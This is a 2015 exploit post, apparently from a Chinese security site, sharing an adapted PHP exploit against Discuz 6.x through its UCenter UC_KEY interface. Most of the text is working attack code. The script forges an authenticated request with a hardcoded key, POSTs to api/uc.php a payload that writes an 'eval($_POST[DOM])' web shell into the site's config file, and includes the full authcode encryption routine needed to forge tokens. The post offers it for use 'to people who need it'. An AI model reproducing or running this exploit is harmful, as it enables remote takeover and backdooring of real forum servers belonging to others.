DZ6.x UC_KEY getwebshell exploit - vulnerability warning - the black bar safety net
2015-11-23T00:00:00
ID MYHACK58:62201569289 Type myhack58 Reporter Anonymous Modified 2015-11-23T00:00:00
Description
UC_KEY exploits for the dz 7.x and dz X series are available online. Today I came across a dz6.0 website, so I analysed the code and adapted the exploit, to share with people who need it. UC_KEY getshell is a widespread and long-standing vulnerability: basically any program that uses the UCenter user center can be exploited, but the exploit has to be written for the specific program. The latest version of dz seems to be patched; I have not looked at the code in detail.

Note three places:
1. In dz6.x the XML parsing is different, so the exp has to be modified to match:
   $post = uc_unserialize(uc_post_contents());
2. In the low version $UC_API is not escaped, so there is no need to submit 2 packets:
   $configfile = preg_replace("/define\('UC_API',\s*'.*?'\);/i", "define('UC_API', '$UC_API');", $configfile);
3. The encryption function in the low version is different.
<?php
// Code copyright belongs to the original author!
$timestamp = time() + 10 * 3600;
$host = "127.0.0.1";
$uc_key = "Qfp1O0N3h5V356bbUdPer3958dp8X3b55dba9fkai7s3q7aby9i3hcnc7ec505sa";
// The request is authenticated only by a "code" parameter encrypted with UC_KEY.
$code = urlencode(_authcode("time=$timestamp&action=updateapps", 'ENCODE', $uc_key));
$cmd1 = '
http://xxx\');eval($_POST[DOM]);//
';
$html1 = send($cmd1);
echo $html1;

// Send $cmd as the POST body to api/uc.php and return the raw HTTP response.
function send($cmd) {
    global $host, $code;
    $message = "POST /dz/api/uc.php?code=" . $code . " HTTP/1.1\r\n";
    $message .= "Accept: */*\r\n";
    $message .= "Referer: " . $host . "\r\n";
    $message .= "Accept-Language: zh-cn\r\n";
    $message .= "Content-Type: application/x-www-form-urlencoded\r\n";
    $message .= "User-Agent: Mozilla/4.0 (compatible; MSIE 6.00; Windows NT 5.1; SV1)\r\n";
    $message .= "Host: " . $host . "\r\n";
    $message .= "Content-Length: " . strlen($cmd) . "\r\n";
    $message .= "Connection: Close\r\n\r\n";
    $message .= $cmd;
    $fp = fsockopen($host, 80);
    fputs($fp, $message);
    $resp = '';
    while ($fp && !feof($fp))
        $resp .= fread($fp, 1024);
    return $resp;
}

// The authcode routine of the low version (see note 3): RC4-style stream cipher keyed from UC_KEY.
function _authcode($string, $operation = 'DECODE', $key = '', $expiry = 0) {
    $ckey_length = 4;
    $key = md5($key ? $key : UC_KEY);
    $keya = md5(substr($key, 0, 16));
    $keyb = md5(substr($key, 16, 16));
    // $keyc is a per-message random prefix, sent in clear at the start of the ciphertext.
    $keyc = $ckey_length ? ($operation == 'DECODE' ? substr($string, 0, $ckey_length) : substr(md5(microtime()), -$ckey_length)) : '';
    $cryptkey = $keya . md5($keya . $keyc);
    $key_length = strlen($cryptkey);
    // Plaintext layout: 10-digit expiry + 16-char MD5 check + message.
    $string = $operation == 'DECODE' ? base64_decode(substr($string, $ckey_length)) : sprintf('%010d', $expiry ? $expiry + time() : 0) . substr(md5($string . $keyb), 0, 16) . $string;
    $string_length = strlen($string);
    $result = '';
    $box = range(0, 255);
    $rndkey = array();
    for ($i = 0; $i <= 255; $i++) {
        $rndkey[$i] = ord($cryptkey[$i % $key_length]);
    }
    // Key scheduling.
    for ($j = $i = 0; $i < 256; $i++) {
        $j = ($j + $box[$i] + $rndkey[$i]) % 256;
        $tmp = $box[$i];
        $box[$i] = $box[$j];
        $box[$j] = $tmp;
    }
    // Keystream generation, XORed with the input.
    for ($a = $j = $i = 0; $i < $string_length; $i++) {
        $a = ($a + 1) % 256;
        $j = ($j + $box[$a]) % 256;
        $tmp = $box[$a];
        $box[$a] = $box[$j];
        $box[$j] = $tmp;
        $result .= chr(ord($string[$i]) ^ ($box[($box[$a] + $box[$j]) % 256]));
    }
    if ($operation == 'DECODE') {
        // Accept only if not expired and the embedded MD5 check matches.
        if ((substr($result, 0, 10) == 0 || substr($result, 0, 10) - time() > 0) && substr($result, 10, 16) == substr(md5(substr($result, 26) . $keyb), 0, 16)) {
            return substr($result, 26);
        } else {
            return '';
        }
    } else {
        return $keyc . str_replace('=', '', base64_encode($result));
    }
}
?>